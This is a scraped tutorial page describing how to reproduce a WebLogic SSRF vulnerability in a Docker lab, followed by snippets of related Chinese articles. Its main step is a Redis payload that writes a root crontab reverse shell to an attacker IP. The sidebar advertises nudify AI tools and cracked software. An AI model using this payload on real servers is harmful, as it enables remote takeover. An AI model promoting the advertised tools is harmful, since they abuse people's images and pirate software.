1. Use docker to build an environment
Docker installation and environment building tutorial: https://www.freebuf.com/sectool/252257.html
Access port 7001
2. Vulnerability reproduction steps
1. Vulnerability page/uddiexplorer/SearchPublicRegistries.jsp
2. Check IBM.
It is found that there is a connection, so there may be ssrf.
3. Use burp suite to capture packets. Click Search
4. Modify the connection of operator parameters
set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save
The above is the detailed content of How to Reproduce Weblogic SSRF Vulnerability. For more information, please follow other related articles on the PHP Chinese website!
比较和区分WebLogic与Tomcat的功能Dec 28, 2023 am 11:41 AMWebLogic和Tomcat是两个常用的Java应用服务器,它们在功能和特点上有一些区别。本文将为读者介绍WebLogic和Tomcat的主要功能对比与区别。WebLogic是由Oracle公司开发和维护的一款Java应用服务器。它作为一个完整的JavaEE(JavaEnterpriseEdition)应用服务器,提供了丰富的功能和高度的可靠性。Web
weblogic攻击手法有哪些May 16, 2023 am 11:16 AM简介weblogic服务器的特点为架构庞大复杂,蓝队一般很难防御,且多部署于外网。而且weblogic的攻击成本比较低,只要存在漏洞,一般可以直接获取目标服务器的root权限。在攻防演习中被各大攻击队,防守方重点关注。当然,目前网上公开的各种exp程序,当然也包括我自己的工具,或多或少都有点问题。于是近期在朋友的要求下,整理了部分攻击方法以及”完美“利用。红队可以用来完善自己的工具,蓝队可以用来写溯源报告。一、探测weblogic是否存在漏洞目前网上公开的资料中,没有一种比较好的方法去判断web
springboot部署到weblogic中jar包冲突如何解决May 11, 2023 pm 05:10 PM背景某项目,客户要求使用已有的weblogic部署已经开发好的springboot,于是乎对springboot进行了部分配置的调整,主要包括去除tomcat依赖,增加启动类的处理。一般都会比较顺利,实际上总会遇到些小问题。问题1打包后发布到weblogic上启动时,如下图所示的错误:从异常内容可以很容易判断出,这是jar包冲突导致的错误。经过定位,weblogic有个目录wls12213\oracle_common\modules\thirdparty,其中存放了一些第三方的默认的jar包,项
如何实现Weblogic SSRF漏洞复现May 14, 2023 pm 08:04 PM一、使用docker搭建环境docker安装及搭建环境教程:https://www.freebuf.com/sectool/252257.html访问7001端口二、漏洞复现步骤1、漏洞存在页面/uddiexplorer/SearchPublicRegistries.jsp2、检查一下IBM这个地方看看发现是个连接,这就可能存在ssrf了3、使用burpsuite抓包,点击Search4、修改operator参数的连接5、访问结果访问不存在的端口返回couldnotconnectoverHTTP
WebLogic与Tomcat的擴展性及差異Dec 28, 2023 am 09:38 AMWebLogic和Tomcat是两种常用的Java应用服务器,它们在可扩展性和功能方面存在着一些区别。本文将分析这两个服务器的可扩展性,并比较它们之间的区别。首先,我们来看一下WebLogic的可扩展性。WebLogic是由Oracle开发的高度可扩展的Java应用服务器。它提供了许多高级功能,包括事务管理、JDBC连接池、分布式缓存等。WebLogic支持
weblogic和tomcat有哪些区别Dec 27, 2023 pm 03:49 PMweblogic和tomcat的区别:1、功能;2、性能;3、规模;4、价格;5、安全性;6、配置和管理;7、社区支持;8、集成能力;9、升级和更新;10、可靠性。详细介绍:1、功能,Weblogic具有强大的功能,包括事务管理、消息队列、数据库连接处理等,还支持EJB和JMS等Java技术标准,而Tomcat主要专注于Servlet和JSP技术的实现等等。
Go中的SSRF攻防战Jul 24, 2023 pm 02:05 PMSSRF英文全拼为Server Side Request Forgery,翻译为服务端请求伪造。攻击者在未能取得服务器权限时,利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网。
Redis中服务端请求伪造SSRF的示例分析May 30, 2023 am 09:18 AMSSRF,即服务端请求伪造。当服务器需要请求资源时,请求的资源、协议、路径等可被用户控制。即可造成SSRF攻击。本文着重研究通过gopher协议,对Redis服务进行SSRF攻击,进而getshell。gopher协议格式首先先了解gopher协议为何物,格式是什么样子:gopher://://_后接TCP数据流在我们测试攻击redis时,可以使用linux自带的curl进行测试。如果使用Centos,为了确保实验成功,最好将Centos的selinux关闭。关闭selinux:setenfor
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
AI Hentai Generator
Generate AI Hentai for free.
Hot Article
Hot Tools
EditPlus Chinese cracked version
Small size, syntax highlighting, does not support code prompt function
Dreamweaver CS6
Visual web development tools
WebStorm Mac version
Useful JavaScript development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
DVWA
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is very vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, to help web developers better understand the process of securing web applications, and to help teachers/students teach/learn in a classroom environment Web application security. The goal of DVWA is to practice some of the most common web vulnerabilities through a simple and straightforward interface, with varying degrees of difficulty. Please note that this software
